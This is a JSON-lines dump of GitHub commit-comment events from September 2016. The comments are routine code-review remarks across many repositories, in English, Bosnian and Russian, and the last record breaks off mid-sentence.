{"id":"4510536109","type":"CommitCommentEvent","actor":{"login":"ackernaut"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18886396,"position":38,"line":38,"path":"src/universal/modules/meeting/components/MeetingAgendaCards/MeetingAgendaCards.js","commit_id":"02dc80ff856f5b0275f9570f32e62c07ab2f3b6c","created_at":"2016-09-02T20:25:53Z","updated_at":"2016-09-02T20:25:53Z","body":"@jordanh try `0` instead of `3` in the `slice()` to see a second row fill out..."}},"created_at":"2016-09-02T20:25:53Z"}
{"id":"4510536522","type":"CommitCommentEvent","actor":{"login":"ackernaut"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18886398,"position":null,"line":null,"path":null,"commit_id":"02dc80ff856f5b0275f9570f32e62c07ab2f3b6c","created_at":"2016-09-02T20:25:58Z","updated_at":"2016-09-02T20:25:58Z","body":"@jordanh ok so it’s not much, but is progress. As of now the layout will handle an array of outcomes. There is a little math to fill rows of 4, first with an input card and then the placeholder cards. The next row automatically renders on lengths of `n+4`."}},"created_at":"2016-09-02T20:25:58Z"}
{"id":"4510536623","type":"CommitCommentEvent","actor":{"login":"lhendey"},"repo":{"name":"NeighborhoodInfoDC/Equity"},"payload":{"comment":{"id":18886400,"position":null,"line":null,"path":null,"commit_id":"edae8c28357ce57ce8a52906b89466f184d51287","created_at":"2016-09-02T20:26:00Z","updated_at":"2016-09-02T20:26:00Z","body":"@mwoluchem proceed please\r\n\r\n-----Original Message-----\r\nFrom: mwoluchem [mailto:notifications@github.com] \r\nSent: Friday, September 02, 2016 4:05 PM\r\nTo: NeighborhoodInfoDC/Equity\r\nCc: Hendey, Leah; Mention\r\nSubject: [NeighborhoodInfoDC/Equity] Added names for StdDev and QC for Leah (edae8c2)\r\n\r\nAdded names for StdDev and QC for Leah\r\n\r\n@lhendey you can look for each point where there's the line: /**Leah - Check that \"wgtfreq\" and \"mean\" match that of the base file**/\r\n\r\nThere's one file with the suffix _stdincl for every file that you created with the original program, with the StdDev/StdErr added as needed. In them, there should be either a var called \"wgtfreq\" that should match the frequency of the basefile for each observation or \"mean\", which naturally should match the percentages of the basefile for each observation. That should be an easy check.\r\n\r\n--\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly or view it on GitHub:\r\nhttps://github.com/NeighborhoodInfoDC/Equity/commit/edae8c28357ce57ce8a52906b89466f184d51287\r\n"}},"created_at":"2016-09-02T20:26:00Z"}
{"id":"4510544547","type":"CommitCommentEvent","actor":{"login":"malahal"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18886418,"position":null,"line":null,"path":null,"commit_id":"44e53936f78071166f1d0e28aa3c42d11b1b855b","created_at":"2016-09-02T20:27:52Z","updated_at":"2016-09-02T20:27:52Z","body":"Looks ok to me, but you should combine all id related patches as they solve the same issue,"}},"created_at":"2016-09-02T20:27:52Z"}
{"id":"4510544799","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18886419,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-02T20:27:56Z","updated_at":"2016-09-02T20:27:56Z","body":"Congrats! :-)"}},"created_at":"2016-09-02T20:27:56Z"}
{"id":"4510547058","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18886424,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-02T20:28:30Z","updated_at":"2016-09-02T20:28:30Z","body":"Another strike. Congrats!"}},"created_at":"2016-09-02T20:28:30Z"}
{"id":"4510548071","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18886425,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-02T20:28:45Z","updated_at":"2016-09-02T20:28:45Z","body":"Congrats too!"}},"created_at":"2016-09-02T20:28:45Z"}
{"id":"4510553847","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"anelhadzich/zadace"},"payload":{"comment":{"id":18886445,"position":null,"line":null,"path":null,"commit_id":"87136c8b9ea27c2a1c8bdf77581e3683c0c505e9","created_at":"2016-09-02T20:30:07Z","updated_at":"2016-09-02T20:30:07Z","body":"fajl RatingControl imas nekoliko spaces i imenu fajla \r\n<img width=\"250\" alt=\"screen shot 2016-09-02 at 22 14 53\" src=\"https://cloud.githubusercontent.com/assets/6802263/18217018/bf146da6-715a-11e6-8e03-720b7bc389d8.png\">\r\n\r\nu viewControlleru (daj mu neko smislienije ime npr MealDetailViewController.swift) imas nekoliko warninga u layoutu. Korisno je da ti bude cisto, npr. label ti nema nikakvih constraint, slika takodjer itd. trebas ih dodati\r\n\r\n2. u MealVIewControlleru ti fali:  `override func tableView(tableView: UITableView, numberOfRowsInSection section: Int) -> Int {\r\n        return meals.count\r\n    }`\r\n\r\n3. zatim treba da das ispravno ime za ReuseIdentifier u TableViewControlleru `MealTableViewCell\r\n\r\n4. funkciju ` func loadSampleMeals() {\r\n        let photo1 = UIImage(named: \"meal1\")!\r\n        let meal1 = Meal(name: \"Caprese Salad\", photo: photo1, rating: 4)!\r\n        \r\n        let photo2 = UIImage(named: \"meal2\")!\r\n        let meal2 = Meal(name: \"Chicken and Potatoes\", photo: photo2, rating: 5)!\r\n        \r\n        let photo3 = UIImage(named: \"meal3\")!\r\n        let meal3 = Meal(name: \"Pasta with Meatballs\", photo: photo3, rating: 3)!\r\n        meals += [meal1, meal2, meal3]\r\n\r\n        }\r\n`\r\nsi cijelu ubacio u viewDidLoad pa se ona nikad nije izvrsavala kako treba. \r\n\r\nUejseto toga, trebas da je stavis kao nezavisnu funkciju izvan bio koje druge i u nrp. `viewWillAppear()` da je pozoves:\r\n\r\ni onda taj snippet koda izgleda ovako:\r\n\r\n`    override func viewWillAppear(animated: Bool) {\r\n        super.viewWillAppear(animated)\r\n        loadSampleMeals()\r\n    }\r\n    \r\n    \r\n    func loadSampleMeals() {\r\n        let photo1 = UIImage(named: \"meal1\")!\r\n        let meal1 = Meal(name: \"Caprese Salad\", photo: photo1, rating: 4)!\r\n        \r\n        let photo2 = UIImage(named: \"meal2\")!\r\n        let meal2 = Meal(name: \"Chicken and Potatoes\", photo: photo2, rating: 5)!\r\n        \r\n        let photo3 = UIImage(named: \"meal3\")!\r\n        let meal3 = Meal(name: \"Pasta with Meatballs\", photo: photo3, rating: 3)!\r\n        meals += [meal1, meal2, meal3]\r\n    }`\r\n\r\nMislim da mozes ti i bolje"}},"created_at":"2016-09-02T20:30:07Z"}
{"id":"4510554098","type":"CommitCommentEvent","actor":{"login":"realwindz"},"repo":{"name":"reinterpretcat/utymap"},"payload":{"comment":{"id":18886448,"position":null,"line":null,"path":null,"commit_id":"47314a5b182eddb8787d65334f393da73043c462","created_at":"2016-09-02T20:30:12Z","updated_at":"2016-09-02T20:30:12Z","body":"@abienvenu Hi, actually I was trying to fix too.  How did you do that? Just change the content in file or you fixed the parser?"}},"created_at":"2016-09-02T20:30:12Z"}
{"id":"4510555040","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18886450,"position":null,"line":null,"path":null,"commit_id":"d4a8f66619dff48776aa680df4775e24341a2331","created_at":"2016-09-02T20:30:24Z","updated_at":"2016-09-02T20:30:24Z","body":"Simple get requests work now:\r\n```\r\nif defined? Truffle\r\n  require \"openssl-stubs\"\r\nend\r\nrequire 'net/http'\r\nrequire 'uri'\r\n\r\nuri = URI('http://rubygems.org/specs.4.8.gz')\r\nres = Net::HTTP.get_response(uri)\r\n\r\nputs res.code\r\n```"}},"created_at":"2016-09-02T20:30:24Z"}
{"id":"4510559118","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886461,"position":102,"line":196,"path":"ALGORYTHMS/PRIMES_LIST/create_primes_list.cpp","commit_id":"aebf42409db5c44bac01b173aa06b961b6d2554b","created_at":"2016-09-02T20:31:22Z","updated_at":"2016-09-02T20:31:22Z","body":"Чтобы вывести числа с разделителем тысяч можно написать\r\n```\r\n#include <locale>\r\n...\r\nstd::locale loc(\"\"); // или \"en_US.UTF-8\", взял это из вывода `locale -a`\r\nstd::cout.imbue(loc);\r\n```\r\nЕсли и другие способы, см. например:\r\n* http://www.cplusplus.com/forum/general/71848/\r\n* http://stackoverflow.com/questions/7276826/c-format-number-with-commas\r\n* http://stackoverflow.com/questions/2648364/how-to-print-a-number-with-a-space-as-thousand-separator\r\n"}},"created_at":"2016-09-02T20:31:22Z"}
{"id":"4510559787","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886464,"position":19,"line":101,"path":"ALGORYTHMS/PRIMES_LIST/create_primes_list.cpp","commit_id":"aebf42409db5c44bac01b173aa06b961b6d2554b","created_at":"2016-09-02T20:31:32Z","updated_at":"2016-09-02T20:31:32Z","body":"ИМХО, s/mks/us/\r\n«Микро» обычно обозначают буквой `µ`, а когда она не доступна (например, в ASCII идентификаторах) – похожей на неё буквой `u`."}},"created_at":"2016-09-02T20:31:32Z"}
{"id":"4510560895","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"athoik/enigma2"},"payload":{"comment":{"id":18886470,"position":null,"line":null,"path":null,"commit_id":"213160652e00deff3ffbba125d427d7a14ed3673","created_at":"2016-09-02T20:31:48Z","updated_at":"2016-09-02T20:31:48Z","body":"You are not missing something, actually Enigma2 misses a total redesign of the UI in order to support multiple delivery systems. All delivery modes should be able to be enabled or disabled on demand. \r\n\r\nEg. When a tuner supports S/C/T and only T enabled, then S and C should be left out. \r\n\r\nOpenATV on their multituner branch have done lot of work towards this approach.\r\n\r\nMy approach was to simply have S without need to switch to C/T in order to use other modes. Simple and clear enough to get merged by OpenPLi without affecting the masses.\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-02T20:31:48Z"}
{"id":"4510563478","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18886477,"position":null,"line":null,"path":null,"commit_id":"61909d5bb58ce857895254080de0efaba4e7d865","created_at":"2016-09-02T20:32:26Z","updated_at":"2016-09-02T20:32:26Z","body":"Some [corrections](https://github.com/manjaro/packages-community/commit/fe2bb4b148db43a1082ee27531e4e32fa7012a3b) were still needed, but I think now it's ok. I'm installling them right now and they seem to be building fine :)"}},"created_at":"2016-09-02T20:32:26Z"}
{"id":"4510563840","type":"CommitCommentEvent","actor":{"login":"pavelevap"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18886478,"position":null,"line":null,"path":null,"commit_id":"19db1a6b4fffa00ac70e4d6ca09f976fdec0dbdf","created_at":"2016-09-02T20:32:30Z","updated_at":"2016-09-02T20:32:30Z","body":"This commit probably caused this: https://wordpress.org/support/topic/resend-email-only-when-specific-conditions-are-met/"}},"created_at":"2016-09-02T20:32:30Z"}
{"id":"4510566047","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"anelhadzich/zadace"},"payload":{"comment":{"id":18886483,"position":null,"line":null,"path":null,"commit_id":"87136c8b9ea27c2a1c8bdf77581e3683c0c505e9","created_at":"2016-09-02T20:33:01Z","updated_at":"2016-09-02T20:33:01Z","body":"ps: \r\n\r\nna kraju treba da embedas  MealsTableViewController u navigationViewController i da dodas UIBarButtonItem koji ce imate segue na DetailsViewController\r\n<img width=\"553\" alt=\"screen shot 2016-09-02 at 22 01 34\" src=\"https://cloud.githubusercontent.com/assets/6802263/18217430/1a3af608-715d-11e6-8d23-f95f3915626a.png\">\r\n"}},"created_at":"2016-09-02T20:33:01Z"}
{"id":"4510574420","type":"CommitCommentEvent","actor":{"login":"ravwojdyla"},"repo":{"name":"spotify/ratatool"},"payload":{"comment":{"id":18886493,"position":31,"line":31,"path":"src/main/scala/com/spotify/ratatool/diffy/AvroDiffy.scala","commit_id":"ecdb790e738a8db7a56b8b3e60e88d64b695bbf9","created_at":"2016-09-02T20:34:52Z","updated_at":"2016-09-02T20:34:52Z","body":"+ @tailrec ?"}},"created_at":"2016-09-02T20:34:52Z"}
{"id":"4510574561","type":"CommitCommentEvent","actor":{"login":"THENEWGAMECREATOR"},"repo":{"name":"mozilla/BrowserQuest"},"payload":{"comment":{"id":18886495,"position":null,"line":null,"path":null,"commit_id":"af32d247cac3495ca430d0effbb88dd5f3250b2c","created_at":"2016-09-02T20:34:54Z","updated_at":"2016-09-02T20:34:54Z","body":"@Zodie that's probably it, yeah I've been on my school laptop, I'll try later on a different computer then tell you what happened."}},"created_at":"2016-09-02T20:34:54Z"}
{"id":"4510575083","type":"CommitCommentEvent","actor":{"login":"ravwojdyla"},"repo":{"name":"spotify/ratatool"},"payload":{"comment":{"id":18886499,"position":68,"line":68,"path":"src/test/scala/com/spotify/ratatool/diffy/AvroDiffyTest.scala","commit_id":"ecdb790e738a8db7a56b8b3e60e88d64b695bbf9","created_at":"2016-09-02T20:35:01Z","updated_at":"2016-09-02T20:35:01Z","body":"Add two diffs"}},"created_at":"2016-09-02T20:35:01Z"}
{"id":"4510575318","type":"CommitCommentEvent","actor":{"login":"reinterpretcat"},"repo":{"name":"reinterpretcat/utymap"},"payload":{"comment":{"id":18886502,"position":null,"line":null,"path":null,"commit_id":"47314a5b182eddb8787d65334f393da73043c462","created_at":"2016-09-02T20:35:05Z","updated_at":"2016-09-02T20:35:05Z","body":"Thanks a lot!\r\n> Notre-Dame de Paris is beautiful\r\nYeah, but there is some flickering due to z-fighting. This is missing implementation of specific roof. Will fix it after MVP.\r\n\r\n"}},"created_at":"2016-09-02T20:35:05Z"}
{"id":"4510577221","type":"CommitCommentEvent","actor":{"login":"layus"},"repo":{"name":"layus/nixpkgs"},"payload":{"comment":{"id":18886517,"position":34,"line":34,"path":"pkgs/applications/science/programming/dafny/default.nix","commit_id":"1972c2703e42adf056badeae80ccb287ed623ebe","created_at":"2016-09-02T20:35:32Z","updated_at":"2016-09-02T20:35:32Z","body":"Because the build needs to be started from a directory with two subdirectories (`boogie` and `dafny`).\r\nI symlink `${boogie}` to get this right, and the build process creates `dafny-1.9.8`, but `cd`'s into it. I therefore need to `cd ..`.\r\nOf course, symlinking `${boogie}` only works because `${boogie}` contains everything (`outputFiles = [ \"*\" ];`)\r\nMaybe i should not bother that much, but it does not feel clean enough."}},"created_at":"2016-09-02T20:35:32Z"}
{"id":"4510581392","type":"CommitCommentEvent","actor":{"login":"catterbu"},"repo":{"name":"coldsnape/my-project"},"payload":{"comment":{"id":18886529,"position":null,"line":null,"path":null,"commit_id":"288808bf76c5bbee615fc7e68eb1a446777f40c7","created_at":"2016-09-02T20:36:33Z","updated_at":"2016-09-02T20:36:33Z","body":"@coldsnape the commit message here is not informative. Maybe something like:\r\n```\r\nAdd additional line to readme\r\n```\r\nThis way we have a present tense verb telling me what was done to README.md. "}},"created_at":"2016-09-02T20:36:33Z"}
{"id":"4510582898","type":"CommitCommentEvent","actor":{"login":"adriatic"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":18886532,"position":null,"line":null,"path":null,"commit_id":"f79496a12d7310fee46c440b04398a30e9a148d5","created_at":"2016-09-02T20:36:54Z","updated_at":"2016-09-02T20:36:54Z","body":"How could any human read or write `id = id.replace(/\\bv?(?:0|[1-9]\\d*)\\.(?:0|[1-9]\\d*)\\.(?:0|[1-9]\\d*)(?:-[\\da-z\\-]+(?:\\.[\\da-z\\-]+)*)?(?:\\+[\\da-z\\-]+(?:\\.[\\da-z\\-]+)*)?\\b/ig, '');`?"}},"created_at":"2016-09-02T20:36:54Z"}
{"id":"4510584277","type":"CommitCommentEvent","actor":{"login":"Hedgehogs4Me"},"repo":{"name":"Hedgehogs4Me/tile-collector-simulator"},"payload":{"comment":{"id":18886535,"position":null,"line":null,"path":null,"commit_id":"3922121c50ee69932184232ecad6c36795d93fc5","created_at":"2016-09-02T20:37:13Z","updated_at":"2016-09-02T20:37:13Z","body":"best commit"}},"created_at":"2016-09-02T20:37:13Z"}
{"id":"4510585720","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18886542,"position":null,"line":null,"path":null,"commit_id":"11464f96f8172e74a9112de58a8fd287bfa8eaea","created_at":"2016-09-02T20:37:32Z","updated_at":"2016-09-02T20:37:32Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 13](http://teamcity.otenv.com/viewLog.html?buildId=5161379&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T20:37:32Z"}
{"id":"4510586398","type":"CommitCommentEvent","actor":{"login":"layus"},"repo":{"name":"layus/nixpkgs"},"payload":{"comment":{"id":18886544,"position":4,"line":41,"path":"pkgs/development/compilers/mono/generic.nix","commit_id":"1972c2703e42adf056badeae80ccb287ed623ebe","created_at":"2016-09-02T20:37:42Z","updated_at":"2016-09-02T20:37:42Z","body":"I did not intend to push that, but yes, it worked. And it removed 300KB from the closure by removing gcc and other buildInputs."}},"created_at":"2016-09-02T20:37:42Z"}
{"id":"4510587999","type":"CommitCommentEvent","actor":{"login":"florinpatrascu"},"repo":{"name":"mschae/boltex"},"payload":{"comment":{"id":18886547,"position":24,"line":null,"path":"lib/boltex/bolt.ex","commit_id":"5654e5f14dd42fb36268995323dc526d335d00a9","created_at":"2016-09-02T20:38:06Z","updated_at":"2016-09-02T20:38:06Z","body":"This should work better ;)  \n`    case transport |> do_receive_data(port) |> unpack do`"}},"created_at":"2016-09-02T20:38:06Z"}
{"id":"4510589221","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18886549,"position":12,"line":12,"path":"dotnetexec.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-02T20:38:23Z","updated_at":"2016-09-02T20:38:23Z","body":">Can you elaborate on how this won't work for other tools?\r\n\r\nWhat do you expect for us to do in our msbuild targets? Do you expect us to execute this ps script? That will be kind of difficult and some cases and also make the logic for doing it different on the different platforms.\r\n\r\nI thought you mentioned that you can call dotnet.exe directly from the shared framework folder which would be my ideal solution to this problem. That way it is just a matter of calling an host exe directly. "}},"created_at":"2016-09-02T20:38:23Z"}
{"id":"4510589295","type":"CommitCommentEvent","actor":{"login":"layus"},"repo":{"name":"layus/nixpkgs"},"payload":{"comment":{"id":18886550,"position":null,"line":null,"path":null,"commit_id":"1972c2703e42adf056badeae80ccb287ed623ebe","created_at":"2016-09-02T20:38:24Z","updated_at":"2016-09-02T20:38:24Z","body":"@obadz Thank you for your comments. I replied to each of them. \r\nMuch appreciated :-)."}},"created_at":"2016-09-02T20:38:24Z"}
{"id":"4510591962","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18886559,"position":null,"line":null,"path":null,"commit_id":"11464f96f8172e74a9112de58a8fd287bfa8eaea","created_at":"2016-09-02T20:39:06Z","updated_at":"2016-09-02T20:39:06Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 13](http://teamcity.otenv.com/viewLog.html?buildId=5161379&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:34"}},"created_at":"2016-09-02T20:39:06Z"}
{"id":"4510600701","type":"CommitCommentEvent","actor":{"login":"vegarringdal"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":18886573,"position":null,"line":null,"path":null,"commit_id":"f79496a12d7310fee46c440b04398a30e9a148d5","created_at":"2016-09-02T20:41:12Z","updated_at":"2016-09-02T20:41:12Z","body":"we have a uuid function in the app... I think"}},"created_at":"2016-09-02T20:41:12Z"}
{"id":"4510602273","type":"CommitCommentEvent","actor":{"login":"bclozel"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":18886574,"position":null,"line":null,"path":null,"commit_id":"db83e89922c2ee7e3886175a875a06bc6faa5b86","created_at":"2016-09-02T20:41:30Z","updated_at":"2016-09-02T20:41:30Z","body":"There's [a dedicated sample showing this](https://github.com/spring-projects/spring-boot/tree/master/spring-boot-samples/spring-boot-sample-web-thymeleaf3)."}},"created_at":"2016-09-02T20:41:30Z"}
{"id":"4510603212","type":"CommitCommentEvent","actor":{"login":"Edmorapez"},"repo":{"name":"Edmorapez/scann"},"payload":{"comment":{"id":18886575,"position":null,"line":null,"path":null,"commit_id":"6c92ca1db5e82b04c51bb0e223339af71c0a42f4","created_at":"2016-09-02T20:41:42Z","updated_at":"2016-09-02T20:41:42Z","body":"serv\r\n"}},"created_at":"2016-09-02T20:41:42Z"}
{"id":"4510604182","type":"CommitCommentEvent","actor":{"login":"catterbu"},"repo":{"name":"Umaramasub/my-project"},"payload":{"comment":{"id":18886576,"position":null,"line":null,"path":null,"commit_id":"980b7a853f923016013df5bc19bee229dc209a62","created_at":"2016-09-02T20:41:53Z","updated_at":"2016-09-02T20:41:53Z","body":"@Umaramasub The commit message here uses a past tense verb. If you changed it to present tense, it would be perfect. Also, I know that we committed multiple files in the first commit, but you may consider committing single files, unless the changes are intimately related, in the future."}},"created_at":"2016-09-02T20:41:53Z"}
{"id":"4510604694","type":"CommitCommentEvent","actor":{"login":"vegarringdal"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":18886579,"position":null,"line":null,"path":null,"commit_id":"f79496a12d7310fee46c440b04398a30e9a148d5","created_at":"2016-09-02T20:42:00Z","updated_at":"2016-09-02T20:42:00Z","body":"never mind... didnt read all..."}},"created_at":"2016-09-02T20:42:00Z"}
{"id":"4510604781","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886580,"position":51,"line":51,"path":"ALGORYTHMS/task1/queue.cpp","commit_id":"c8785e410096148fd19f5cbc036ed24500b7b630","created_at":"2016-09-02T20:42:01Z","updated_at":"2016-09-02T20:42:01Z","body":"В этой задаче хочется видеть отдельный класс с интерфейсом очереди:\r\n```\r\ntemplate <typename T>\r\nclass my_queue {\r\npublic:\r\n    ... push_back(...);\r\n    ... pop_front(...);\r\n...\r\nprivate:\r\n    stack<T> in;\r\n    stack<T> out;\r\n};\r\n```\r\nчтобы `main()` уже только пользовалась этим интерфейсом, а не реализовывала очередь сама."}},"created_at":"2016-09-02T20:42:01Z"}
{"id":"4510605130","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"merimad/Zadace"},"payload":{"comment":{"id":18886584,"position":null,"line":null,"path":null,"commit_id":"dd83f5a202be553c794f56195084a32121fb8330","created_at":"2016-09-02T20:42:07Z","updated_at":"2016-09-02T20:42:07Z","body":"cao merima, bilo bi dobro da zavrsis ovu drugu zadacu do kraja"}},"created_at":"2016-09-02T20:42:07Z"}
{"id":"4510625332","type":"CommitCommentEvent","actor":{"login":"thebearingedge"},"repo":{"name":"scottbrassfield/online-shopping"},"payload":{"comment":{"id":18886628,"position":323,"line":419,"path":"default.js","commit_id":"c7c9999a30f464ec8973e5294857506b4d405e70","created_at":"2016-09-02T20:46:51Z","updated_at":"2016-09-02T20:46:51Z","body":"```js\r\nshow.setAttribute('style', 'display: block')\r\n```\r\nShould work fine. It's basically a chunk of CSS.\r\n\r\n```css\r\n  display: block; color: black; text-align: center\r\n```"}},"created_at":"2016-09-02T20:46:51Z"}
{"id":"4510625845","type":"CommitCommentEvent","actor":{"login":"onodera-punpun"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":18886631,"position":1,"line":1,"path":"autofs/.footprint","commit_id":"d2cecaa16ac3c5039e0cf9aaaa4dde4131eda7b7","created_at":"2016-09-02T20:46:58Z","updated_at":"2016-09-02T20:46:58Z","body":"So this is kinda messy getting dropped in root for some reason, however autofs whines without it here..."}},"created_at":"2016-09-02T20:46:58Z"}
{"id":"4510627280","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"stackPie/Stackpie"},"payload":{"comment":{"id":18886634,"position":null,"line":null,"path":null,"commit_id":"a259806784ac9840c952cf94a23c883a459e2208","created_at":"2016-09-02T20:47:19Z","updated_at":"2016-09-02T20:47:19Z","body":"I just realized that i won't be needing multer ^_^"}},"created_at":"2016-09-02T20:47:19Z"}
{"id":"4510629143","type":"CommitCommentEvent","actor":{"login":"thebearingedge"},"repo":{"name":"scottbrassfield/online-shopping"},"payload":{"comment":{"id":18886638,"position":323,"line":419,"path":"default.js","commit_id":"c7c9999a30f464ec8973e5294857506b4d405e70","created_at":"2016-09-02T20:47:46Z","updated_at":"2016-09-02T20:47:46Z","body":"It's better to use CSS classes for this sort of thing though."}},"created_at":"2016-09-02T20:47:46Z"}
{"id":"4510629717","type":"CommitCommentEvent","actor":{"login":"RonNewcomb"},"repo":{"name":"angular-ui/bootstrap"},"payload":{"comment":{"id":18886639,"position":null,"line":null,"path":null,"commit_id":"ddcacb7a8313e69a4975fa1fa9451b5e3facc65e","created_at":"2016-09-02T20:47:54Z","updated_at":"2016-09-02T20:47:54Z","body":"is there a branch of 1.3.3 that has this fix?  Can there be a 1.3.3.1 or something containing it?  I don't feel comfortable upgrading our project to 2.0.0 due to all the breaking changes. \r\n"}},"created_at":"2016-09-02T20:47:54Z"}
{"id":"4510634351","type":"CommitCommentEvent","actor":{"login":"zeke"},"repo":{"name":"electron/electron"},"payload":{"comment":{"id":18886649,"position":null,"line":null,"path":null,"commit_id":"8471f647a1675e79e0642743d703f7091f549628","created_at":"2016-09-02T20:48:59Z","updated_at":"2016-09-02T20:48:59Z","body":"☕ "}},"created_at":"2016-09-02T20:48:59Z"}
{"id":"4510635489","type":"CommitCommentEvent","actor":{"login":"krakel"},"repo":{"name":"MyM-ModpackTeam/hypovolemia"},"payload":{"comment":{"id":18886653,"position":null,"line":null,"path":null,"commit_id":"e60ed06309c5b706a99b3efe38091a8e05d761ad","created_at":"2016-09-02T20:49:18Z","updated_at":"2016-09-02T20:49:18Z","body":"no quest book fixes :("}},"created_at":"2016-09-02T20:49:18Z"}
{"id":"4510636322","type":"CommitCommentEvent","actor":{"login":"Ironsss"},"repo":{"name":"Ironsss/hello-world"},"payload":{"comment":{"id":18886654,"position":null,"line":null,"path":null,"commit_id":"4b596407d61c210fc7a2368db88b27136a557015","created_at":"2016-09-02T20:49:32Z","updated_at":"2016-09-02T20:49:32Z","body":"fjdsldjd\r\n"}},"created_at":"2016-09-02T20:49:32Z"}
{"id":"4510638784","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"ljharb/eslint"},"payload":{"comment":{"id":18886657,"position":23,"line":94,"path":"lib/rules/max-statements-per-line.js","commit_id":"8f452284dcf94aafcbddce870b91eba9c3dea26b","created_at":"2016-09-02T20:50:05Z","updated_at":"2016-09-02T20:50:05Z","body":"I'll give that a shot!"}},"created_at":"2016-09-02T20:50:05Z"}
{"id":"4510640830","type":"CommitCommentEvent","actor":{"login":"spalladino"},"repo":{"name":"crystal-lang/crystal-db"},"payload":{"comment":{"id":18886662,"position":null,"line":null,"path":null,"commit_id":"d3606831f3679592198fa24df0d039764bcd55d0","created_at":"2016-09-02T20:50:34Z","updated_at":"2016-09-02T20:50:34Z","body":"👏 "}},"created_at":"2016-09-02T20:50:34Z"}
{"id":"4510641727","type":"CommitCommentEvent","actor":{"login":"AllThingsDataGit"},"repo":{"name":"AllThingsDataGit/Diggit"},"payload":{"comment":{"id":18886665,"position":null,"line":null,"path":null,"commit_id":"7a81c33b701e2ee4d5f8a72b55254fae88e35e13","created_at":"2016-09-02T20:50:48Z","updated_at":"2016-09-02T20:50:48Z","body":"This is second change on sep 2nd. Long wkend is here."}},"created_at":"2016-09-02T20:50:48Z"}
{"id":"4510645575","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18886680,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T20:51:44Z","updated_at":"2016-09-02T20:51:44Z","body":"@mstembera Moving this into pawns would be logical though (as long as our concept of initiative is all about pawns and kings), besides the optimization and (foremost) the possibility to evaluate the position more and more precisely because of the reduced impact on the nps count...\r\n(Now unfortunately I really have to concentrate on other things, sorry! Of course feel free yourself to use my branch!)"}},"created_at":"2016-09-02T20:51:44Z"}
{"id":"4510645743","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886681,"position":65,"line":65,"path":"ALGORYTHMS/task1/queue.cpp","commit_id":"c8785e410096148fd19f5cbc036ed24500b7b630","created_at":"2016-09-02T20:51:46Z","updated_at":"2016-09-02T20:51:46Z","body":"В плане тестирования хочется видеть сравнение результатов **случайной** последовательности операций `my_queue` и `std::queue`.\r\nТ.е. ты в цикле случайным образом выбираешь одну из доступных операций: `push_back()` или `pop_front()`. Совершаешь эту операцию параллельно с`my_queue` и с `std::queue`.\r\n(Как раз значение, которое отправляется в `push_back()` лучше брать не случайное, а уникальное. Например, из возрастающей последовательности чисел.)\r\nЕсли это была операция `pop_front()`, проверяешь что либо обе реализации очереди сказали что очередь была пуста, либо обе вернули одинаковое значение. Кроме того, имеет смысл 